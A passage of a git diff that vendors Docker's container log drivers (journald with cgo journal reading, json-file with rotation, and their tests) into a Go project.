url.Scheme != "udp" { + return "", fmt.Errorf("gelf: endpoint needs to be UDP") + } + + // get host and port + if _, _, err = net.SplitHostPort(url.Host); err != nil { + return "", 
fmt.Errorf("gelf: please provide gelf-address as udp://host:port") + } + + return url.Host, nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go new file mode 100644 index 0000000000..266f73b18b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go @@ -0,0 +1,3 @@ +// +build !linux + +package gelf diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go new file mode 100644 index 0000000000..9569859121 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go @@ -0,0 +1,122 @@ +// +build linux + +// Package journald provides the log driver for forwarding server logs +// to endpoints that receive the systemd format. +package journald + +import ( + "fmt" + "sync" + "unicode" + + "github.com/Sirupsen/logrus" + "github.com/coreos/go-systemd/journal" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" +) + +const name = "journald" + +type journald struct { + vars map[string]string // additional variables and values to send to the journal along with the log message + readers readerList +} + +type readerList struct { + mu sync.Mutex + readers map[*logger.LogWatcher]*logger.LogWatcher +} + +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, validateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// sanitizeKeyMode returns the sanitized string so that it could be used in journald. +// In journald log, there are special requirements for fields. +// Fields must be composed of uppercase letters, numbers, and underscores, but must +// not start with an underscore. 
+func sanitizeKeyMod(s string) string { + n := "" + for _, v := range s { + if 'a' <= v && v <= 'z' { + v = unicode.ToUpper(v) + } else if ('Z' < v || v < 'A') && ('9' < v || v < '0') { + v = '_' + } + // If (n == "" && v == '_'), then we will skip as this is the beginning with '_' + if !(n == "" && v == '_') { + n += string(v) + } + } + return n +} + +// New creates a journald logger using the configuration passed in on +// the context. +func New(ctx logger.Context) (logger.Logger, error) { + if !journal.Enabled() { + return nil, fmt.Errorf("journald is not enabled on this host") + } + // Strip a leading slash so that people can search for + // CONTAINER_NAME=foo rather than CONTAINER_NAME=/foo. + name := ctx.ContainerName + if name[0] == '/' { + name = name[1:] + } + + // parse log tag + tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if err != nil { + return nil, err + } + + vars := map[string]string{ + "CONTAINER_ID": ctx.ContainerID[:12], + "CONTAINER_ID_FULL": ctx.ContainerID, + "CONTAINER_NAME": name, + "CONTAINER_TAG": tag, + } + extraAttrs := ctx.ExtraAttributes(sanitizeKeyMod) + for k, v := range extraAttrs { + vars[k] = v + } + return &journald{vars: vars, readers: readerList{readers: make(map[*logger.LogWatcher]*logger.LogWatcher)}}, nil +} + +// We don't actually accept any options, but we have to supply a callback for +// the factory to pass the (probably empty) configuration map to. 
+func validateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case "labels": + case "env": + case "tag": + default: + return fmt.Errorf("unknown log opt '%s' for journald log driver", key) + } + } + return nil +} + +func (s *journald) Log(msg *logger.Message) error { + vars := map[string]string{} + for k, v := range s.vars { + vars[k] = v + } + if msg.Partial { + vars["CONTAINER_PARTIAL_MESSAGE"] = "true" + } + if msg.Source == "stderr" { + return journal.Send(string(msg.Line), journal.PriErr, vars) + } + return journal.Send(string(msg.Line), journal.PriInfo, vars) +} + +func (s *journald) Name() string { + return name +} diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go new file mode 100644 index 0000000000..224423fd07 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go @@ -0,0 +1,23 @@ +// +build linux + +package journald + +import ( + "testing" +) + +func TestSanitizeKeyMod(t *testing.T) { + entries := map[string]string{ + "io.kubernetes.pod.name": "IO_KUBERNETES_POD_NAME", + "io?.kubernetes.pod.name": "IO__KUBERNETES_POD_NAME", + "?io.kubernetes.pod.name": "IO_KUBERNETES_POD_NAME", + "io123.kubernetes.pod.name": "IO123_KUBERNETES_POD_NAME", + "_io123.kubernetes.pod.name": "IO123_KUBERNETES_POD_NAME", + "__io123_kubernetes.pod.name": "IO123_KUBERNETES_POD_NAME", + } + for k, v := range entries { + if sanitizeKeyMod(k) != v { + t.Fatalf("Failed to sanitize %s, got %s, expected %s", k, sanitizeKeyMod(k), v) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go new file mode 100644 index 0000000000..d52ca92e4f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go @@ -0,0 +1,6 @@ +// +build !linux + +package journald 
+ +type journald struct { +} diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read.go b/vendor/github.com/docker/docker/daemon/logger/journald/read.go new file mode 100644 index 0000000000..d91eb809bc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read.go @@ -0,0 +1,401 @@ +// +build linux,cgo,!static_build,journald + +package journald + +// #include +// #include +// #include +// #include +// #include +// #include +// #include +// #include +// #include +// +//static int get_message(sd_journal *j, const char **msg, size_t *length, int *partial) +//{ +// int rc; +// size_t plength; +// *msg = NULL; +// *length = 0; +// plength = strlen("CONTAINER_PARTIAL_MESSAGE=true"); +// rc = sd_journal_get_data(j, "CONTAINER_PARTIAL_MESSAGE", (const void **) msg, length); +// *partial = ((rc == 0) && (*length == plength) && (memcmp(*msg, "CONTAINER_PARTIAL_MESSAGE=true", plength) == 0)); +// rc = sd_journal_get_data(j, "MESSAGE", (const void **) msg, length); +// if (rc == 0) { +// if (*length > 8) { +// (*msg) += 8; +// *length -= 8; +// } else { +// *msg = NULL; +// *length = 0; +// rc = -ENOENT; +// } +// } +// return rc; +//} +//static int get_priority(sd_journal *j, int *priority) +//{ +// const void *data; +// size_t i, length; +// int rc; +// *priority = -1; +// rc = sd_journal_get_data(j, "PRIORITY", &data, &length); +// if (rc == 0) { +// if ((length > 9) && (strncmp(data, "PRIORITY=", 9) == 0)) { +// *priority = 0; +// for (i = 9; i < length; i++) { +// *priority = *priority * 10 + ((const char *)data)[i] - '0'; +// } +// if (length > 9) { +// rc = 0; +// } +// } +// } +// return rc; +//} +//static int is_attribute_field(const char *msg, size_t length) +//{ +// static const struct known_field { +// const char *name; +// size_t length; +// } fields[] = { +// {"MESSAGE", sizeof("MESSAGE") - 1}, +// {"MESSAGE_ID", sizeof("MESSAGE_ID") - 1}, +// {"PRIORITY", sizeof("PRIORITY") - 1}, +// {"CODE_FILE", sizeof("CODE_FILE") - 1}, 
+// {"CODE_LINE", sizeof("CODE_LINE") - 1}, +// {"CODE_FUNC", sizeof("CODE_FUNC") - 1}, +// {"ERRNO", sizeof("ERRNO") - 1}, +// {"SYSLOG_FACILITY", sizeof("SYSLOG_FACILITY") - 1}, +// {"SYSLOG_IDENTIFIER", sizeof("SYSLOG_IDENTIFIER") - 1}, +// {"SYSLOG_PID", sizeof("SYSLOG_PID") - 1}, +// {"CONTAINER_NAME", sizeof("CONTAINER_NAME") - 1}, +// {"CONTAINER_ID", sizeof("CONTAINER_ID") - 1}, +// {"CONTAINER_ID_FULL", sizeof("CONTAINER_ID_FULL") - 1}, +// {"CONTAINER_TAG", sizeof("CONTAINER_TAG") - 1}, +// }; +// unsigned int i; +// void *p; +// if ((length < 1) || (msg[0] == '_') || ((p = memchr(msg, '=', length)) == NULL)) { +// return -1; +// } +// length = ((const char *) p) - msg; +// for (i = 0; i < sizeof(fields) / sizeof(fields[0]); i++) { +// if ((fields[i].length == length) && (memcmp(fields[i].name, msg, length) == 0)) { +// return -1; +// } +// } +// return 0; +//} +//static int get_attribute_field(sd_journal *j, const char **msg, size_t *length) +//{ +// int rc; +// *msg = NULL; +// *length = 0; +// while ((rc = sd_journal_enumerate_data(j, (const void **) msg, length)) > 0) { +// if (is_attribute_field(*msg, *length) == 0) { +// break; +// } +// rc = -ENOENT; +// } +// return rc; +//} +//static int wait_for_data_cancelable(sd_journal *j, int pipefd) +//{ +// struct pollfd fds[2]; +// uint64_t when = 0; +// int timeout, jevents, i; +// struct timespec ts; +// uint64_t now; +// +// memset(&fds, 0, sizeof(fds)); +// fds[0].fd = pipefd; +// fds[0].events = POLLHUP; +// fds[1].fd = sd_journal_get_fd(j); +// if (fds[1].fd < 0) { +// return fds[1].fd; +// } +// +// do { +// jevents = sd_journal_get_events(j); +// if (jevents < 0) { +// return jevents; +// } +// fds[1].events = jevents; +// sd_journal_get_timeout(j, &when); +// if (when == -1) { +// timeout = -1; +// } else { +// clock_gettime(CLOCK_MONOTONIC, &ts); +// now = (uint64_t) ts.tv_sec * 1000000 + ts.tv_nsec / 1000; +// timeout = when > now ? 
(int) ((when - now + 999) / 1000) : 0; +// } +// i = poll(fds, 2, timeout); +// if ((i == -1) && (errno != EINTR)) { +// /* An unexpected error. */ +// return (errno != 0) ? -errno : -EINTR; +// } +// if (fds[0].revents & POLLHUP) { +// /* The close notification pipe was closed. */ +// return 0; +// } +// if (sd_journal_process(j) == SD_JOURNAL_APPEND) { +// /* Data, which we might care about, was appended. */ +// return 1; +// } +// } while ((fds[0].revents & POLLHUP) == 0); +// return 0; +//} +import "C" + +import ( + "fmt" + "strings" + "time" + "unsafe" + + "github.com/Sirupsen/logrus" + "github.com/coreos/go-systemd/journal" + "github.com/docker/docker/daemon/logger" +) + +func (s *journald) Close() error { + s.readers.mu.Lock() + for reader := range s.readers.readers { + reader.Close() + } + s.readers.mu.Unlock() + return nil +} + +func (s *journald) drainJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, oldCursor *C.char) *C.char { + var msg, data, cursor *C.char + var length C.size_t + var stamp C.uint64_t + var priority, partial C.int + + // Walk the journal from here forward until we run out of new entries. +drain: + for { + // Try not to send a given entry twice. + if oldCursor != nil { + for C.sd_journal_test_cursor(j, oldCursor) > 0 { + if C.sd_journal_next(j) <= 0 { + break drain + } + } + } + // Read and send the logged message, if there is one to read. + i := C.get_message(j, &msg, &length, &partial) + if i != -C.ENOENT && i != -C.EADDRNOTAVAIL { + // Read the entry's timestamp. + if C.sd_journal_get_realtime_usec(j, &stamp) != 0 { + break + } + // Set up the time and text of the entry. + timestamp := time.Unix(int64(stamp)/1000000, (int64(stamp)%1000000)*1000) + line := C.GoBytes(unsafe.Pointer(msg), C.int(length)) + if partial == 0 { + line = append(line, "\n"...) + } + // Recover the stream name by mapping + // from the journal priority back to + // the stream that we would have + // assigned that value. 
+ source := "" + if C.get_priority(j, &priority) != 0 { + source = "" + } else if priority == C.int(journal.PriErr) { + source = "stderr" + } else if priority == C.int(journal.PriInfo) { + source = "stdout" + } + // Retrieve the values of any variables we're adding to the journal. + attrs := make(map[string]string) + C.sd_journal_restart_data(j) + for C.get_attribute_field(j, &data, &length) > C.int(0) { + kv := strings.SplitN(C.GoStringN(data, C.int(length)), "=", 2) + attrs[kv[0]] = kv[1] + } + if len(attrs) == 0 { + attrs = nil + } + // Send the log message. + logWatcher.Msg <- &logger.Message{ + Line: line, + Source: source, + Timestamp: timestamp.In(time.UTC), + Attrs: attrs, + } + } + // If we're at the end of the journal, we're done (for now). + if C.sd_journal_next(j) <= 0 { + break + } + } + + // free(NULL) is safe + C.free(unsafe.Pointer(oldCursor)) + C.sd_journal_get_cursor(j, &cursor) + return cursor +} + +func (s *journald) followJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, pfd [2]C.int, cursor *C.char) *C.char { + s.readers.mu.Lock() + s.readers.readers[logWatcher] = logWatcher + s.readers.mu.Unlock() + go func() { + // Keep copying journal data out until we're notified to stop + // or we hit an error. + status := C.wait_for_data_cancelable(j, pfd[0]) + for status == 1 { + cursor = s.drainJournal(logWatcher, config, j, cursor) + status = C.wait_for_data_cancelable(j, pfd[0]) + } + if status < 0 { + cerrstr := C.strerror(C.int(-status)) + errstr := C.GoString(cerrstr) + fmtstr := "error %q while attempting to follow journal for container %q" + logrus.Errorf(fmtstr, errstr, s.vars["CONTAINER_ID_FULL"]) + } + // Clean up. + C.close(pfd[0]) + s.readers.mu.Lock() + delete(s.readers.readers, logWatcher) + s.readers.mu.Unlock() + C.sd_journal_close(j) + close(logWatcher.Msg) + }() + // Wait until we're told to stop. + select { + case <-logWatcher.WatchClose(): + // Notify the other goroutine that its work is done. 
+ C.close(pfd[1]) + } + + return cursor +} + +func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadConfig) { + var j *C.sd_journal + var cmatch, cursor *C.char + var stamp C.uint64_t + var sinceUnixMicro uint64 + var pipes [2]C.int + + // Get a handle to the journal. + rc := C.sd_journal_open(&j, C.int(0)) + if rc != 0 { + logWatcher.Err <- fmt.Errorf("error opening journal") + close(logWatcher.Msg) + return + } + // If we end up following the log, we can set the journal context + // pointer and the channel pointer to nil so that we won't close them + // here, potentially while the goroutine that uses them is still + // running. Otherwise, close them when we return from this function. + following := false + defer func(pfollowing *bool) { + if !*pfollowing { + C.sd_journal_close(j) + close(logWatcher.Msg) + } + }(&following) + // Remove limits on the size of data items that we'll retrieve. + rc = C.sd_journal_set_data_threshold(j, C.size_t(0)) + if rc != 0 { + logWatcher.Err <- fmt.Errorf("error setting journal data threshold") + return + } + // Add a match to have the library do the searching for us. + cmatch = C.CString("CONTAINER_ID_FULL=" + s.vars["CONTAINER_ID_FULL"]) + defer C.free(unsafe.Pointer(cmatch)) + rc = C.sd_journal_add_match(j, unsafe.Pointer(cmatch), C.strlen(cmatch)) + if rc != 0 { + logWatcher.Err <- fmt.Errorf("error setting journal match") + return + } + // If we have a cutoff time, convert it to Unix time once. + if !config.Since.IsZero() { + nano := config.Since.UnixNano() + sinceUnixMicro = uint64(nano / 1000) + } + if config.Tail > 0 { + lines := config.Tail + // Start at the end of the journal. + if C.sd_journal_seek_tail(j) < 0 { + logWatcher.Err <- fmt.Errorf("error seeking to end of journal") + return + } + if C.sd_journal_previous(j) < 0 { + logWatcher.Err <- fmt.Errorf("error backtracking to previous journal entry") + return + } + // Walk backward. 
+ for lines > 0 { + // Stop if the entry time is before our cutoff. + // We'll need the entry time if it isn't, so go + // ahead and parse it now. + if C.sd_journal_get_realtime_usec(j, &stamp) != 0 { + break + } else { + // Compare the timestamp on the entry + // to our threshold value. + if sinceUnixMicro != 0 && sinceUnixMicro > uint64(stamp) { + break + } + } + lines-- + // If we're at the start of the journal, or + // don't need to back up past any more entries, + // stop. + if lines == 0 || C.sd_journal_previous(j) <= 0 { + break + } + } + } else { + // Start at the beginning of the journal. + if C.sd_journal_seek_head(j) < 0 { + logWatcher.Err <- fmt.Errorf("error seeking to start of journal") + return + } + // If we have a cutoff date, fast-forward to it. + if sinceUnixMicro != 0 && C.sd_journal_seek_realtime_usec(j, C.uint64_t(sinceUnixMicro)) != 0 { + logWatcher.Err <- fmt.Errorf("error seeking to start time in journal") + return + } + if C.sd_journal_next(j) < 0 { + logWatcher.Err <- fmt.Errorf("error skipping to next journal entry") + return + } + } + cursor = s.drainJournal(logWatcher, config, j, nil) + if config.Follow { + // Allocate a descriptor for following the journal, if we'll + // need one. Do it here so that we can report if it fails. + if fd := C.sd_journal_get_fd(j); fd < C.int(0) { + logWatcher.Err <- fmt.Errorf("error opening journald follow descriptor: %q", C.GoString(C.strerror(-fd))) + } else { + // Create a pipe that we can poll at the same time as + // the journald descriptor. + if C.pipe(&pipes[0]) == C.int(-1) { + logWatcher.Err <- fmt.Errorf("error opening journald close notification pipe") + } else { + cursor = s.followJournal(logWatcher, config, j, pipes, cursor) + // Let followJournal handle freeing the journal context + // object and closing the channel. 
+ following = true + } + } + } + + C.free(unsafe.Pointer(cursor)) + return +} + +func (s *journald) ReadLogs(config logger.ReadConfig) *logger.LogWatcher { + logWatcher := logger.NewLogWatcher() + go s.readLogs(logWatcher, config) + return logWatcher +} diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go new file mode 100644 index 0000000000..bba6de55be --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go @@ -0,0 +1,6 @@ +// +build linux,cgo,!static_build,journald,!journald_compat + +package journald + +// #cgo pkg-config: libsystemd +import "C" diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go new file mode 100644 index 0000000000..3f7a43c59e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go @@ -0,0 +1,6 @@ +// +build linux,cgo,!static_build,journald,journald_compat + +package journald + +// #cgo pkg-config: libsystemd-journal +import "C" diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go new file mode 100644 index 0000000000..b43abdcaf7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go @@ -0,0 +1,7 @@ +// +build !linux !cgo static_build !journald + +package journald + +func (s *journald) Close() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go new file mode 100644 index 0000000000..a429a08a4f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go @@ -0,0 +1,151 @@ +// Package jsonfilelog provides the default Logger implementation for 
+// Docker logging. This logger logs to files on the host server in the +// JSON format. +package jsonfilelog + +import ( + "bytes" + "encoding/json" + "fmt" + "strconv" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/go-units" +) + +// Name is the name of the file that the jsonlogger logs to. +const Name = "json-file" + +// JSONFileLogger is Logger implementation for default Docker logging. +type JSONFileLogger struct { + buf *bytes.Buffer + writer *loggerutils.RotateFileWriter + mu sync.Mutex + readers map[*logger.LogWatcher]struct{} // stores the active log followers + extra []byte // json-encoded extra attributes +} + +func init() { + if err := logger.RegisterLogDriver(Name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(Name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates new JSONFileLogger which writes to filename passed in +// on given context. 
+func New(ctx logger.Context) (logger.Logger, error) { + var capval int64 = -1 + if capacity, ok := ctx.Config["max-size"]; ok { + var err error + capval, err = units.FromHumanSize(capacity) + if err != nil { + return nil, err + } + } + var maxFiles = 1 + if maxFileString, ok := ctx.Config["max-file"]; ok { + var err error + maxFiles, err = strconv.Atoi(maxFileString) + if err != nil { + return nil, err + } + if maxFiles < 1 { + return nil, fmt.Errorf("max-file cannot be less than 1") + } + } + + writer, err := loggerutils.NewRotateFileWriter(ctx.LogPath, capval, maxFiles) + if err != nil { + return nil, err + } + + var extra []byte + if attrs := ctx.ExtraAttributes(nil); len(attrs) > 0 { + var err error + extra, err = json.Marshal(attrs) + if err != nil { + return nil, err + } + } + + return &JSONFileLogger{ + buf: bytes.NewBuffer(nil), + writer: writer, + readers: make(map[*logger.LogWatcher]struct{}), + extra: extra, + }, nil +} + +// Log converts logger.Message to jsonlog.JSONLog and serializes it to file. +func (l *JSONFileLogger) Log(msg *logger.Message) error { + timestamp, err := jsonlog.FastTimeMarshalJSON(msg.Timestamp) + if err != nil { + return err + } + l.mu.Lock() + logline := msg.Line + if !msg.Partial { + logline = append(msg.Line, '\n') + } + err = (&jsonlog.JSONLogs{ + Log: logline, + Stream: msg.Source, + Created: timestamp, + RawAttrs: l.extra, + }).MarshalJSONBuf(l.buf) + if err != nil { + l.mu.Unlock() + return err + } + + l.buf.WriteByte('\n') + _, err = l.writer.Write(l.buf.Bytes()) + l.buf.Reset() + l.mu.Unlock() + + return err +} + +// ValidateLogOpt looks for json specific log options max-file & max-size. +func ValidateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case "max-file": + case "max-size": + case "labels": + case "env": + default: + return fmt.Errorf("unknown log opt '%s' for json-file log driver", key) + } + } + return nil +} + +// LogPath returns the location the given json logger logs to. 
+func (l *JSONFileLogger) LogPath() string { + return l.writer.LogPath() +} + +// Close closes underlying file and signals all readers to stop. +func (l *JSONFileLogger) Close() error { + l.mu.Lock() + err := l.writer.Close() + for r := range l.readers { + r.Close() + delete(l.readers, r) + } + l.mu.Unlock() + return err +} + +// Name returns name of this logger. +func (l *JSONFileLogger) Name() string { + return Name +} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go new file mode 100644 index 0000000000..b5b818a8ba --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go @@ -0,0 +1,248 @@ +package jsonfilelog + +import ( + "encoding/json" + "io/ioutil" + "os" + "path/filepath" + "reflect" + "strconv" + "testing" + "time" + + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/pkg/jsonlog" +) + +func TestJSONFileLogger(t *testing.T) { + cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + tmp, err := ioutil.TempDir("", "docker-logger-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + filename := filepath.Join(tmp, "container.log") + l, err := New(logger.Context{ + ContainerID: cid, + LogPath: filename, + }) + if err != nil { + t.Fatal(err) + } + defer l.Close() + + if err := l.Log(&logger.Message{Line: []byte("line1"), Source: "src1"}); err != nil { + t.Fatal(err) + } + if err := l.Log(&logger.Message{Line: []byte("line2"), Source: "src2"}); err != nil { + t.Fatal(err) + } + if err := l.Log(&logger.Message{Line: []byte("line3"), Source: "src3"}); err != nil { + t.Fatal(err) + } + res, err := ioutil.ReadFile(filename) + if err != nil { + t.Fatal(err) + } + expected := `{"log":"line1\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line2\n","stream":"src2","time":"0001-01-01T00:00:00Z"} 
+{"log":"line3\n","stream":"src3","time":"0001-01-01T00:00:00Z"} +` + + if string(res) != expected { + t.Fatalf("Wrong log content: %q, expected %q", res, expected) + } +} + +func BenchmarkJSONFileLogger(b *testing.B) { + cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + tmp, err := ioutil.TempDir("", "docker-logger-") + if err != nil { + b.Fatal(err) + } + defer os.RemoveAll(tmp) + filename := filepath.Join(tmp, "container.log") + l, err := New(logger.Context{ + ContainerID: cid, + LogPath: filename, + }) + if err != nil { + b.Fatal(err) + } + defer l.Close() + + testLine := "Line that thinks that it is log line from docker\n" + msg := &logger.Message{Line: []byte(testLine), Source: "stderr", Timestamp: time.Now().UTC()} + jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON() + if err != nil { + b.Fatal(err) + } + b.SetBytes(int64(len(jsonlog)+1) * 30) + b.ResetTimer() + for i := 0; i < b.N; i++ { + for j := 0; j < 30; j++ { + if err := l.Log(msg); err != nil { + b.Fatal(err) + } + } + } +} + +func TestJSONFileLoggerWithOpts(t *testing.T) { + cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + tmp, err := ioutil.TempDir("", "docker-logger-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + filename := filepath.Join(tmp, "container.log") + config := map[string]string{"max-file": "2", "max-size": "1k"} + l, err := New(logger.Context{ + ContainerID: cid, + LogPath: filename, + Config: config, + }) + if err != nil { + t.Fatal(err) + } + defer l.Close() + for i := 0; i < 20; i++ { + if err := l.Log(&logger.Message{Line: []byte("line" + strconv.Itoa(i)), Source: "src1"}); err != nil { + t.Fatal(err) + } + } + res, err := ioutil.ReadFile(filename) + if err != nil { + t.Fatal(err) + } + penUlt, err := ioutil.ReadFile(filename + ".1") + if err != nil { + t.Fatal(err) + } + + expectedPenultimate := 
`{"log":"line0\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line1\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line2\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line3\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line4\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line5\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line6\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line7\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line8\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line9\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line10\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line11\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line12\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line13\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line14\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line15\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +` + expected := `{"log":"line16\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line17\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line18\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line19\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +` + + if string(res) != expected { + t.Fatalf("Wrong log content: %q, expected %q", res, expected) + } + if string(penUlt) != expectedPenultimate { + t.Fatalf("Wrong log content: %q, expected %q", penUlt, expectedPenultimate) + } + +} + +func TestJSONFileLoggerWithLabelsEnv(t *testing.T) { + cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + tmp, err := ioutil.TempDir("", "docker-logger-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + filename := filepath.Join(tmp, "container.log") + config := map[string]string{"labels": "rack,dc", "env": "environ,debug,ssl"} + l, err := New(logger.Context{ + ContainerID: cid, + 
LogPath: filename, + Config: config, + ContainerLabels: map[string]string{"rack": "101", "dc": "lhr"}, + ContainerEnv: []string{"environ=production", "debug=false", "port=10001", "ssl=true"}, + }) + if err != nil { + t.Fatal(err) + } + defer l.Close() + if err := l.Log(&logger.Message{Line: []byte("line"), Source: "src1"}); err != nil { + t.Fatal(err) + } + res, err := ioutil.ReadFile(filename) + if err != nil { + t.Fatal(err) + } + + var jsonLog jsonlog.JSONLogs + if err := json.Unmarshal(res, &jsonLog); err != nil { + t.Fatal(err) + } + extra := make(map[string]string) + if err := json.Unmarshal(jsonLog.RawAttrs, &extra); err != nil { + t.Fatal(err) + } + expected := map[string]string{ + "rack": "101", + "dc": "lhr", + "environ": "production", + "debug": "false", + "ssl": "true", + } + if !reflect.DeepEqual(extra, expected) { + t.Fatalf("Wrong log attrs: %q, expected %q", extra, expected) + } +} + +func BenchmarkJSONFileLoggerWithReader(b *testing.B) { + b.StopTimer() + b.ResetTimer() + cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + dir, err := ioutil.TempDir("", "json-logger-bench") + if err != nil { + b.Fatal(err) + } + defer os.RemoveAll(dir) + + l, err := New(logger.Context{ + ContainerID: cid, + LogPath: filepath.Join(dir, "container.log"), + }) + if err != nil { + b.Fatal(err) + } + defer l.Close() + msg := &logger.Message{Line: []byte("line"), Source: "src1"} + jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON() + if err != nil { + b.Fatal(err) + } + b.SetBytes(int64(len(jsonlog)+1) * 30) + + b.StartTimer() + + go func() { + for i := 0; i < b.N; i++ { + for j := 0; j < 30; j++ { + l.Log(msg) + } + } + l.Close() + }() + + lw := l.(logger.LogReader).ReadLogs(logger.ReadConfig{Follow: true}) + watchClose := lw.WatchClose() + for { + select { + case <-lw.Msg: + case <-watchClose: + return + } + } +} diff --git 
a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go new file mode 100644 index 0000000000..f2f9df1887 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go @@ -0,0 +1,319 @@ +package jsonfilelog + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "io" + "os" + "time" + + "github.com/fsnotify/fsnotify" + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/pkg/filenotify" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/pkg/tailfile" +) + +const maxJSONDecodeRetry = 20000 + +func decodeLogLine(dec *json.Decoder, l *jsonlog.JSONLog) (*logger.Message, error) { + l.Reset() + if err := dec.Decode(l); err != nil { + return nil, err + } + msg := &logger.Message{ + Source: l.Stream, + Timestamp: l.Created, + Line: []byte(l.Log), + Attrs: l.Attrs, + } + return msg, nil +} + +// ReadLogs implements the logger's LogReader interface for the logs +// created by this driver. +func (l *JSONFileLogger) ReadLogs(config logger.ReadConfig) *logger.LogWatcher { + logWatcher := logger.NewLogWatcher() + + go l.readLogs(logWatcher, config) + return logWatcher +} + +func (l *JSONFileLogger) readLogs(logWatcher *logger.LogWatcher, config logger.ReadConfig) { + defer close(logWatcher.Msg) + + // lock so the read 